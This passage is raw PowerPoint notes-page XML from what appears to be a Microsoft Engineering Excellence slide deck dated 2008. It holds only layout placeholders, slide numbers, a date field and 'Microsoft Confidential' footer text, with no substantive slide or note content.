              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>18</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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F901D7BA-0DD8-4A8C-92E0-C43328913B20}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/10/2008 2:29 AM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>© 2006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5540" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2CED541B-94A4-4608-9BF8-92EB820BC845}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65541"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34822" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"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15A665A9-C2A2-49DC-8871-90C1F3AA5B8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr 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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20</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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F2EE2901-1D7E-4DF6-9A57-3F513D6E43F5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>22</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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67588" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F22FFE51-C7A6-493F-B968-099C2C8E317D}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/10/2008 2:29 AM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>© 2006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7590" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{68B1E560-7323-4D05-AF70-42E382631586}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>24</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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68611" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68612" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E760FED8-1917-4950-BA1F-668DB72930C1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>26</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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>27</a:t>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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>28</a:t>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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>29</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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>3</a:t>
            </a:fld>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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>30</a:t>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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>31</a:t>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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>32</a:t>
            </a:fld>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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld>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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>34</a:t>
            </a:fld>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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69636" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B70B4CBC-9A25-4E72-A848-866BB53A4504}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/10/2008 2:29 AM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>© 2006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9638" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{78308C13-DE5B-4E50-B10C-C9A23C74522F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>36</a:t>
            </a:fld>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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60420" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C0A7D257-51D7-4112-AB13-7073989E1848}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70660" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C85FE54A-6A02-45BE-8DE9-5D623FA5B2C2}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>39</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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61444" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1E6553BD-41F0-4687-8F43-1AC52DB62D60}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D1B0096-8F8C-430C-8BDA-E08927EB454D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="684213"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71684" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486400" cy="4116388"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" smtClean="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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr 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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr 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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr 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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr 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E03780F0-4AA2-41C3-82AB-38480666EF65}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr 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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="912813"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Engineering Excellence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="912813" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Microsoft Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72708" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="912813"/>
            <a:fld id="{8EED2B4B-432A-4D95-9DC9-4437F05E663A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="912813"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72709" name="Rectangle 2"/>
          <p:cNvSpPr>
